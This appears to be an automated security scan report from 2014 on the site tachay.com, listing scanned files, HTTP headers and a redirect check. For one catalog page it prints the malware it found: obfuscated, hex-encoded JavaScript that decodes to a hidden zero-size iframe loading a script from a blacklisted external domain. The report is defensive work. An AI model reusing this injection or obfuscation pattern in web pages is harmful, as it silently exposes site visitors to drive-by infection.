Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tachay.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tachay.com/ | 200 OK Content-Length: 11793 Content-Type: text/html | clean |
http://tachay.com/cataloga432.html | 200 OK Content-Length: 19482 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: private3.zapto.org var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62c ...[1839 bytes skipped]... Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> | ||
http://tachay.com/js/prototype.js | 200 OK Content-Length: 47603 Content-Type: application/javascript | clean |
http://tachay.com/js/scriptaculous.js?load=effects | 200 OK Content-Length: 2152 Content-Type: application/javascript | clean |
http://tachay.com/js/lightbox.js | 200 OK Content-Length: 22726 Content-Type: application/javascript | clean |
http://tachay.com/images/catalog/mainpictures/cat_1/Picture008.jpg | 200 OK Content-Length: 58317 Content-Type: image/jpeg | clean |
http://tachay.com/test404page.js | 404 Not Found Content-Length: 1033 Content-Type: text/html | clean |
http://tachay.com/images/catalog/mainpictures/cat_1/Picture009.jpg | 200 OK Content-Length: 51562 Content-Type: image/jpeg | clean |
http://tachay.com/images/catalog/mainpictures/cat_1/Picture010.jpg | 200 OK Content-Length: 64853 Content-Type: image/jpeg | clean |
http://tachay.com/images/catalog/mainpictures/cat_1/Picture011.jpg | 200 OK Content-Length: 52065 Content-Type: image/jpeg | clean |
http://tachay.com/images/catalog/mainpictures/cat_1/Picture012.jpg | 200 OK Content-Length: 62399 Content-Type: image/jpeg | clean |
http://tachay.com/images/catalog/mainpictures/cat_1/Picture013.jpg | 200 OK Content-Length: 43862 Content-Type: image/jpeg | clean |
http://tachay.com/images/catalog/mainpictures/cat_1/Picture014.jpg | 200 OK Content-Length: 54666 Content-Type: image/jpeg | clean |
http://tachay.com/images/catalog/mainpictures/cat_1/Picture015.jpg | 200 OK Content-Length: 58369 Content-Type: image/jpeg | clean |
http://tachay.com/images/catalog/mainpictures/cat_1/Picture016.jpg | 200 OK Content-Length: 54544 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tachay.com
Result:
HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 19:17:17 GMT
Accept-Ranges: bytes
ETag: "f079e6955ccdcf1:0"
Server: Microsoft-IIS/8.0
Content-Length: 11793
Content-Type: text/html
Last-Modified: Thu, 11 Sep 2014 01:06:15 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...11793 bytes of data.
GET / HTTP/1.1
Host: tachay.com
Result:
HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 19:17:17 GMT
Accept-Ranges: bytes
ETag: "f079e6955ccdcf1:0"
Server: Microsoft-IIS/8.0
Content-Length: 11793
Content-Type: text/html
Last-Modified: Thu, 11 Sep 2014 01:06:15 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...11793 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tachay.com
Referer: http://www.google.com/search?q=tachay.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tachay.com
Referer: http://www.google.com/search?q=tachay.com
Result:
The result is similar to the first query. There are no suspicious redirects found.